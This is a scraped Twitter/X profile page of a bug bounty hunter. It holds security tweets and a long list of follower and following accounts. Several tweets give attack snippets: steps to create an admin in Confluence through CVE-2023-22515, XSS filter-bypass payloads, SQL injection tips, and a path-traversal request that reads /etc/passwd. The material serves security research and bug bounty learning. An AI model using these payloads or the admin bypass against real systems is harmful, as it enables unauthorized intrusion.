Anton @therceman
👋 I’m Anton (therceman) 🪲 Bug Bounty Hunter 💬 Sharing Bug Bounty Hunting Knowledge ℹ️ ➡️ 🎞️ https://t.co/D1MVWyjoKS 💡 https://t.co/ZsPdqy8BI6 therceman.dev Latvia Joined October 2019-
Tweets4K
-
Followers20K
-
Following597
-
Likes10K
Anyone looking for Senior PHP Developer? Lumen/Laravel, MySQL, Redis, RabbitMQ, Docker, WebSockets Microservice development approach Currently building backend for probably fair online casino casual games (similar to StakeCom - Dice, Mines, Plinko, Keno, Crash) From Latvia🇱🇻
Bug Bounty Tip CVE-2023-22515 (new admin creation) Atlassian Confluence 8 Versions: <8.3.3, <8.4.3, <8.5.2 1) enable setup /server-info.action?bootstrapStatusProvider.applicationConfig.setupComplete=false 2) create a new admin /setup/setupadministrator-start.action Cheers!
Bug Bounty Tip Bypass XSS WAF protection using a comment between a JS function name and parameters <img/src/onerror=alert/*1337*/(1)> <img/src/onerror=alert//
(2)> <img/src/onerror=alert/**/(3)> Cheers!
Bug Bounty Tip Bypass XSS WAF protection using Whitespace Separators between a JS function name and parameters <img/src/onerror=alert(1337)> Refer to the attached image for the full list of Whitespace Separators. P.S. can be used before function name too. Cheers!
Bug Bounty Tip When testing an app for SQL injection, don't forget to check the form keys in addition to the values Sometimes, developers may overlook applying protection to form keys To bypass spaces, you can use the encoded tab %09. For other symbols, simply URL encode them
Bug Bounty Tip Quote-less base64 encoded XSS payload <img/src/onerror=setTimeout(atob(/YWxlcnQoMTMzNyk/.source))> Cheers!
The XSS Rat - Uncle R.. @theXSSrat
128K Followers 888 Following Alone we survive, together we prosper. Are you with me? https://t.co/AfnDsVhqqAMd Ismail Šojal @0x0SojalSec
22K Followers 4K Following Cyber_Security_Researchers || 0SINT || Digital Forensics System Analysis / incident Response II Pwn || GH0ST_3xP10iT || 0ld Accounts Suspended @0xSojalSec ||Aditya Shende @ADITYASHENDE17
51K Followers 421 Following MS Cyber 🇬🇧 | Bugcrowd Top 100 | Overseas Pentest Trainer | Keynote Speaker | Professional Biker | 🌎 @kong_sec 🦍Mike Takahashi @TakSec
21K Followers 531 Following Pentester | Bug Bounty Hunter | AI Whisperer '><embed src=javascript%26%63%6f%6c%6f%6e%3balert('TakSec')>Jason Haddix @Jhaddix
146K Followers 7K Following CEO, CISO, Trainer, Hacker, and Speaker. @arcanuminfosec 18 years hacking + sec leadership. ex:BuddoBot-Ubisoft-Bugcrowd-Fortify-HP-Redspin-Citrix.Het Mehta @hetmehtaa
24K Followers 953 Following Security Analyst | Content Creator | I Spread Cyber Security & Talk about AI, Cloud, Tech, Tools & Updatespayloadartist @payloadartist
34K Followers 288 Following Tweeting about Application Security, Hacking, & Cybersecurity • Helped secure organizations like Google • Opinions are my ownNithin 🦹♂️ @thebinarybot
16K Followers 515 Following Hacking machines and life | Community Manager @InfoSecComm | eJPT | Certified Red Team Professional (CRTP)hakluke @hakluke
88K Followers 2K Following Hacker, bounties, entrepreneur. I help cybersecurity companies produce amazing content for their blogs and socials. Founder of: @haksecio and @hacker_contentMD Sagor Hossain (Pro.. @bughuntar
11K Followers 38 Following Security Researcher at @Hacker0x01 #FreePalestine 🇵🇸张惠倩 @momika233
15K Followers 195 Following 上天入地无所不能小女子是也!! Anda boleh melakukan segala-galanya dari syurga ke bumi, wanita kecil!! If you have any questions, please contact meTushar Verma 🇮🇳 @e11i0t_4lders0n
21K Followers 796 Following Offensive Security Consultant at NST-Cyber | @SynackRedTeam Member | Public Speaker | Open for Freelance EngagementsRohit @sec_r0
23K Followers 1K Following Security engineer by day @getEthoslife, globetrotter by night and other day, trying new cuisines! 🌎🍴 #SecurityZines Ex - {@walmart, @visa, @gojektech}Nathaniel @nnwakelam
38K Followers 1K FollowingTuan Anh Nguyen 🇻�.. @haxor31337
13K Followers 2K Following 28 y/o Bug Bounty Hunter and Red Teamer at Viettel Cyber Security. Brand Ambassador @Hacker0x01 - Researcher Spotlight @BugcrowdDavid.B @BoundlessMindX7
25 Followers 678 Following Cyber Pathfinder in Training 🛡️ || WGU Cybersecurity Student 💻🏫 || Intel Insights ✨and AI Enthusiast 🧠 || ⚔️Veteran || Casual 🎮🕹️👾Electronicsseeker @libertarian108
7 Followers 913 Followinglilil @ls_i0
0 Followers 466 FollowingMajeed @sudo_uwu
69 Followers 563 Following Self-taught 🥷🏻 Open Source 😼 Distro Hopper 🥴 { DevOps | CyberSecurity | Networking | Linux }Compact blue @Taha_shh
2 Followers 199 Following جانوری که قبلا یک مرد بود به سوی گهواری ای جدید میرفتScare @Scare421
22 Followers 114 FollowingKalai Mr little @KLittle70724
34 Followers 70 FollowingBirdEaton @0BackEnd0
0 Followers 36 FollowingT-Rex @0xt_r3x
7 Followers 255 FollowingAkash Soni @akashsoni2061
0 Followers 48 Following Coding alchemist ✨ | Transforming caffeine into code ☕ | Data explorer 💻 | Constantly learning and growing 🌱 GitHub : https://t.co/NhuyQnbPBqSai1 @The_Sai1
6 Followers 150 FollowingCameron Melissia @CMelissia52536
1 Followers 42 Followingnoone @Kariem_Alaa_
0 Followers 37 FollowingSebastian Cornejo @CuriositySec
1K Followers 1K Following Ingeniero informático, apasionado por la seguridad y curioso por naturaleza, innovador y con ganas de emprender con varias ideas y proyectos. Fundador de$urAArchith @Suraarchith09
14 Followers 86 FollowingPradeep kher @pradeepkher15
0 Followers 37 Followingyou @Wxhyyu
23 Followers 279 FollowingGrapinet Tom @Tgrpt1
2 Followers 101 Following🇺🇸 Martin Reyes.. @MartinReyes40
608 Followers 3K Following Network Administrator / Systems Engineerdb @Ynootie
4 Followers 480 FollowingPablo Pampa Rocha @SilvioPampaRoch
241 Followers 2K Following Il aime les langues modernes, Algorithmique et programmation, Open Source et la technologie - bushidōDavid Anderson @DaveofNYC
156 Followers 463 FollowingCyberOPS MX @CyberopsM92115
12 Followers 662 FollowingSiam Patowary(homelan.. @Siamp121
0 Followers 44 FollowingKk K @bbcx420
31 Followers 142 Followingvivan @vivan13556
0 Followers 49 FollowingKhald Salhi @KhaldSalhi75897
8 Followers 165 FollowingNouvexr @nouvexr
1 Followers 97 FollowingTristaKathleen @U3X83D6yxlgfsi
11 Followers 202 Followingtao chen @taochen63799532
60 Followers 535 FollowingHeber Moreira Jr @WR4lTH_
68 Followers 260 Following Information Security/Pentester/Bug Bounty Hunter/ Programmer/ Problem Solvertiger t @r00tEG
0 Followers 45 Followingamine SQ @amineSQ19792
0 Followers 79 Followingbeic @beichangyo
96 Followers 180 FollowingVinay Kumar 🇮🇳 @Xplo8E
908 Followers 223 Following Proud Indian | Security Researcher (Mostly IOS & Android apps pentesting) | Secularism is a mythSIDDHARTH SANGWAN @S_SNGWN
53 Followers 80 Following || Web Application Pentester || || Mobile Application Pentester || || Cloud Architect || || Cyber Security Trainer ||Pup Coby/Doggo Conyer.. @DoggoConyers
0 Followers 140 Following Pup, Boston, work in Infosec. Spend free time playing with synths? yeah.معاذ عفيفي �.. @imooaaz
158 Followers 921 Following قد أبت غلبات شوقه إلا الهجرة إلى الله و رسوله، و مقتت نفسه الرفقاء إلا ابن سبيل يرافقه في سبيله 🇵🇸 CSE Engineer | Pentester | Bug Hunter0xBotwin.eth @0xBotwin
3K Followers 347 Following Web3 Security and Education. Professor by Day, Degen by Night.Aloul @Aloul40
94 Followers 2K Following https://t.co/JudJs4hfl2 لا اله الا انت سبحانك اني كنت من الظالمينThomas Anderson @mrthomasanders
15 Followers 636 Following Programmer/ graduated in Mathematics, Researcher/ Hacking/ Pentester 🧑💻Intigriti @intigriti
155K Followers 644 Following Global Bug Bounty & VDP Platform. 🌐: https://t.co/fgCupJckrW ▶️: https://t.co/lRfCzZBgb7 👾: https://t.co/Inf7N9VQIlBen Sadeghipour @NahamSec
197K Followers 1K Following Cofounder @hackinghub_io, Advisor @Trick3st @CaidoIO. I hack companies and make content about it. Bug Bounty Village & #NahamCon organizer. ex @hacker0x01🇮🇷The XSS Rat - Uncle R.. @theXSSrat
128K Followers 888 Following Alone we survive, together we prosper. Are you with me? https://t.co/AfnDsVhqqAMd Ismail Šojal @0x0SojalSec
22K Followers 4K Following Cyber_Security_Researchers || 0SINT || Digital Forensics System Analysis / incident Response II Pwn || GH0ST_3xP10iT || 0ld Accounts Suspended @0xSojalSec ||bugcrowd @Bugcrowd
161K Followers 6K Following The leading provider of crowdsourced cybersecurity solutions purpose-built to secure the digitally connected world...Unleash Ingenuity™🇸🇦 ROOD | GOAT @0x_rood
21K Followers 299 Following Ich heiße rood | born to be bug hunter | more than 1000 bugsAditya Shende @ADITYASHENDE17
51K Followers 421 Following MS Cyber 🇬🇧 | Bugcrowd Top 100 | Overseas Pentest Trainer | Keynote Speaker | Professional Biker | 🌎 @kong_sec 🦍Mike Takahashi @TakSec
21K Followers 531 Following Pentester | Bug Bounty Hunter | AI Whisperer '><embed src=javascript%26%63%6f%6c%6f%6e%3balert('TakSec')>Joseph Thacker @rez0__
49K Followers 866 Following the promptfather. christian. hacker. hobby jogger. principal ai engineer @appomnisecurity.Jason Haddix @Jhaddix
146K Followers 7K Following CEO, CISO, Trainer, Hacker, and Speaker. @arcanuminfosec 18 years hacking + sec leadership. ex:BuddoBot-Ubisoft-Bugcrowd-Fortify-HP-Redspin-Citrix.InfoSec Community @InfoSecComm
38K Followers 637 Following Largest InfoSec publication with 30k+ followers and 1M+ monthly views. 3rd edition of @IWcon_ happening in December 2023!Corben Leo @hacker_
68K Followers 659 Following I hack stuff (legally) | Jesus follower | Co-founder @boringmattressReconOne @ReconOne_bk
16K Followers 49 Following Tweet about Bug Bounty, Recon, Recon Tips and Attack Surface. Improve you Recon skills and find your first Bug 💪payloadartist @payloadartist
34K Followers 288 Following Tweeting about Application Security, Hacking, & Cybersecurity • Helped secure organizations like Google • Opinions are my ownTCM Security @TCMSecurity
185K Followers 328 Following Disrupting the education and hacking industry. Come learn to hack at TCM Security Academy! Veteran owned. Quality results.Katie Paxton-Fear @InsiderPhD
82K Followers 2K Following Dr, apparently. Creator @traceableai, Lecturer & Hacker. #BugBounty hunter & #infosec YouTuber. APIs & Interlinked OffSec, PhD in AI+Sec @hacknotcrime. she/herNithin 🦹♂️ @thebinarybot
16K Followers 515 Following Hacking machines and life | Community Manager @InfoSecComm | eJPT | Certified Red Team Professional (CRTP)ArcBlock @ArcBlock_io
40K Followers 96 Following BUILD For the Future. dApps, Blockchains, Cryptos and AI Made Easy. Empower developers for Web3 and AI revolution.Talaria Security Labs.. @UGWST_COM
2K Followers 13 Following Manual Security Audits - https://t.co/TYOQMQ7U6r Real-Time Vulnerability Monitoring - https://t.co/0YquDRPhWsLupin @0xLupin
13K Followers 548 Following Roni Carta alias Lupin. Co-Founder of Lupin & Holmes. R&D. Red Teamer. Bug Hunter. Musician 🤘sarwech @starwardshar
2K Followers 259 Following 1 exit. Indie hacking my way to $5,000 MRR in 2024! 🤖 Make AI videos - https://t.co/ILh2BBJoAY 🐦 Twitter banners - https://t.co/Q5fLPKDriTJonas Tyroller || Mak.. @JonasTyroller
16K Followers 190 Following Indie Game Developer / YouTuber My games: ISLANDERS, Will You Snail, ThronefallConcernedApe @ConcernedApe
1.2M Followers 93 Following creator of Stardew Valley -- working on "Haunted Chocolatier"tldraw @tldraw
56K Followers 7 Following infinite canvas / https://t.co/oXL4NAc6P8 / https://t.co/dO6WPp6YOI / https://t.co/FbWiDYFD3OSwiftOnSecurity @SwiftOnSecurity
403K Followers 9K Following computer security person. former helpdesk.Philipp C. Heckel @binwiederhier
323 Followers 265 Following Principal Engineer during the day, and working on the push notification service https://t.co/UDtUd113Px at night.Ashutosh Barot @ashu_barot
1K Followers 1K Following Looking for a new role | Security Researcher 💻 | Featured in @techcrunch @thehackersnews | MTech🎓 #NFSU| 12x CVEs | #2 Coinbase, H1| Securing web2,3Volutedberet @volutedberet
176 Followers 134 Following Just another indiedev making games as a hobby. Currently working on Mini Factories 2, a highly addictive, highscore based factory builderCharlesWang @CharlesWangP
17K Followers 582 Following Securing web3 since 2020 | Over 250 audits conducted | Trusted by the largest protocols | Over 500 high risk findings | Lead auditor @bailsecurityDanny Postma @dannypostmaa
114K Followers 678 Following Founder of https://t.co/reapzFhWNK Building the future of photography.Bun @bunjavascript
41K Followers 1 Following Bun is a fast, all-in-one toolkit for installing, bundling, running and testing JavaScript & TypeScript. To install: `npm i -g bun`Motion By Golden @MotionByGolden
209 Followers 416 Following Building https://t.co/8l8svO8M57 | Looking To Create Animated Video Content For Your Startup? Well, You Found Your Solution! Reviewing Video Ads Every Week!0xblackbird @0xblackbird
5K Followers 393 Following founder @novasecio. Securing SaaS applications. DM for early access.Lost Game Dev @_LostGameDev
408 Followers 49 Following I'm David, the game developer behind "Hooked" - a casual, cozy and relaxing isometric fishing game. (IN DEVELOPMENT) Wishlist: https://t.co/GKyHacCw1jhuli @aszx87410
4K Followers 401 Following Taiwan / Front-end Engineer <=> Security Researcher. Interested in web. CTF player at @Water_PaddlerEarth of Oryn 🏰 @EarthOfOryn
5K Followers 513 Following City builder game with strategy in a medieval world 💬 Discord https://t.co/4za9473Q1h 🎮 Wishlist on Steam https://t.co/8PQECMTOIVBrute Logic @BRuteLogic
59K Followers 283 Following #CyberSecurity R&D | #XSS | #WAF #bypass | #hack2learn | @rodoassis | @KN0X55 | https://t.co/vOa3E883V0Ideogram @ideogram_ai
39K Followers 0 Following Helping people become more creative. It's pronounced eye-diogram. Join our lovely community at https://t.co/aKDNl4OOQf.KALSON. @kalsonkalu
6K Followers 309 Following DESIGNER. STORYTELLER. — unleashing #AI and sharing interesting things! | DM’s are open!Stormgate @PlayStormgate
24K Followers 134 Following Stormgate is the upcoming RTS from @Frost_Giant featuring hyper-responsive gameplay, 3P co-op, 1v1, and a powerful editor. Join the beta on Indiegogo!kitze 🚀 @thekitze
56K Followers 506 Following 🧑💻 @sizzyapp - Browser For Devs 🐶 @benjiDotSo - Life OS 🚀 @ZeroToShipped - Course 🎙️ pod: https://t.co/dRFO9QMnSB 🍿 vids: https://t.co/0JZXtmYVrFNick @MrNick_Buzz
29K Followers 2K Following product design partner for startup founders. 🤙Book a Call https://t.co/M3sf7NvdON | https://t.co/OvLJ49ICvS | https://t.co/nZtzRR1Dd4 | building https://t.co/dfUQ6dvSUd | ex @MetaStarforge Systems @StarforgePCs
322K Followers 126 Following The Best PCs in the Universe. Owned by @OTKnetwork, @jschlatt, and @MoistCr1TiKaLTae’lur Alexis @TaelurAlexis
58K Followers 5K Following Developer & Pentester | Cyberbarbie on @twitchtv | Check Out My Blog ⬇️Ankita Dhakar @expankita
6K Followers 252 Following Co-Founder and CEO @capturethebugs | Managing Director @security_lit | Cybersecurity enthusiast 🥷 Building AI-powered Vulnerability Intelligence Platform 🇳🇿Access Protocol @AccessProtocol
99K Followers 727 Following Reinventing content monetization. Creator inquiries: https://t.co/5FSxxP0tfg Discord: https://t.co/VpvnxEOKZdBlood and Mead @BloodAndMead
4K Followers 3K Following A Bone Crushingly Satisfying Norse-Metal Themed Combat Adventure! Wishlist: https://t.co/EYER8Y4FuLJohn Stejskal @johnstejskal
4K Followers 973 Following Solo IndieDev working on Blood And Mead - A Bone Crushing Combat Sidescroller https://t.co/A3pO0PWjzzzeu @zeu_dev
3K Followers 577 Following software engineer @saucedopen 🍕 | https://t.co/lLEpOOHDik | https://t.co/qmPD7MMihR | https://t.co/rMx8kK75mL | 🇵🇭🇺🇸🏳️🌈merkle_bonsai @merkle_bonsai
1K Followers 242 Following Smart contract & blockchain whitehat. #32 on @immunefi. Feel free to DMJay Freeman (saurik) @saurik
431K Followers 140 Following I developed Cydia for jailbroken iOS devices and am now (theoretically) in charge of technology for @OrchidProtocol; I am also a local politician in California.pwning.eth | Offside .. @PwningEth
6K Followers 21 Following the newest pwn star on the block(chain)! won $8M+ bounty✨ for protecting $300M+ funds at risk🔥| Whitehat @Immunefi Hall of Fame 🏆| @Offside_Labs CTOVeiledShot @VeiledshotG
128 Followers 19 Following Yes, I am Jon Snow. Official Diablo Partner Affiliated with AMGForce @ForceStrategy
28K Followers 263 Following I talk about games on YouTube https://t.co/waudd924JM Contact: [email protected]Tech Unicorn 🦄 @tech__unicorn
5K Followers 266 Following Travelling the world & building cool things👩💻 Ex-@google. I turn coffee into code, have 10 degrees & count in binary (if you don’t get it sry)Kick.com @KickStreaming
440K Followers 364 Following https://t.co/4D5A8TqSKD Pick Kick. https://t.co/EmLBT5vEwiOpen Campus @opencampus_xyz
238K Followers 63 Following First community-led #education protocol to build a #decentralized campus, adopted by @TinyTapAB and @newcampushq https://t.co/SEpcVQHbrWWorld of Warcraft Sea.. @Diablo4_News
22K Followers 395 Following Season of Discovery World of Warcraft News about Classes and SoDOmar Espino • @omespino
11K Followers 663 Following Security hall of fame: Google VRP • Microsoft • Reddit • Telegram • Twitter • Facebook • Apple • Netflix • Slack • etc •Masonhck357 @Masonhck3571
14K Followers 715 Following 🔍 Top 100 Bug Bounty Hunter @ Bugcrowd | 🇩🇴 Dominican | Ethical hacking fanatic | 🎮🎵 Lover | Keeping the digital world safe.Josip Franjković @JosipFranjkovic
5K Followers 945 Following I am an average Joe who enjoys breaking websites. My security blog: https://t.co/dtvxa0rjfwI just added an extra property 'is-site-admin':true, and voilà, I became one of the site admins.🤣🤣🤣🤟🤟#bugbounty
Currently Ranked #150 in worldwide ranking at @intigriti Bug Bounty Platform. #bugbounty #ethicalhacking #hackforgood
@Hashem_Mo0 1/ spend your bounties wisely 2/ start investing into other fields. 3/ stay curious and adapt your hacking mentality to everything you encounter 4/ "real" hackers who didn't start hacking for money often have the entrepreneurial mindset. Focus and develop it. 5/ with you first…
Don't be trapped in only hacking/bug bounty. Build an exit door for when you feel exhausted. Hacking requires a lot of concentration and can drain your energy very quick. Be wise.
soon enough there will be a video for BugCrwod Level Up explaining how I found 90% from P1s for the last 12 months with a lot of BB Tips
It's gone... BMW on H1 was one of my favorite programs and made a really good amount of bucks despite a low bounty fir OoS. I had learned a lot abt SQLi while hacking their systems. Thank you @BMWGroup for those quick bucks and the knowledge I gained. #BMW @Hacker0x01 #BugBounty
Similar to that Figma xss,I recently had a scenario where onerror/onload were blocked so I needed an event which would trigger automatically and should work for this case where user controllable value is assigned to a innerHTML but that element is never added to the dom.
2 interesting XSS writeups by @sudhanshur705 github.com/Sudistark/xss-…
I have found a new method for account takeover, almost all websites are vulnerable to it. #bugbounty
Why am I looking for zero days in some random product on a random subdomain of bug bounty program with shit bounties?
@TanmayLP7 some really great examples here: docs.google.com/presentation/d…
65+ million customers PII exposed, including passwords in *plaintext* Probably I will write about this if I'm allowed to. keywords: path traversal - secondary context - error message
I have been focusing a lot more on server side issues for the past few months. It has paid a lot. These are a few of the rewards i received on @Hacker0x01 this year from Uber and Airbnb(public programs) mostly uber. @Hacker0x01 has fast triage and these programs also pay for…
@RootMoksha @therceman Cool list. These payloads are soo relevant. I even used one to pwn a machine "Perfection" from HTB yesterday
After many sleepless night I finally broke the world record for the most powerful 7B model. The model is yours now, enjoy!
Starting my next full-time job tomorrow. It's been a great almost 1.75 year run in full-time BB. Thanks to everyone who hit me up for collabs, supported me, and the amazing friends around the world I've met. This community is full of great people and kindness. Y'all are awesome!
If you do not screenshot your targets... keep reading! Because you probably have missed out on a lot of surface-level vulnerabilities that could have helped you earn more bounties! 🤑 Here are the top 3 tools for screenshotting your targets after probing for live hosts! 🧵 👇
🥳 ArcBlock ($ABT) has officially hit 35,000+ Accounts on Mainnet! As the ArcBlock ecosystem expands, so does our reach. Every new account represents one step closer towards a more connected, #decentralized future.
If you're texting for XSS, you might want to learn how to encode your payloads and use them wisely. @therceman shares a quick and neat bug bounty tip on this.
Bug Bounty Tip Always check different encodings for your XSS payload. For example: ?q=<img src onerror=alert(1)> ?q=\u003cimg src onerror=alert(1)\u003e There might be a filter that removes <>, but not unicode symbols \u003c \u003e. Cheers!
Program fixed this vulnerability in like 4 hours after triage..but triage to bounty it took 22 days... 🧐🧐 #BugBounty ``/resources/app/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd``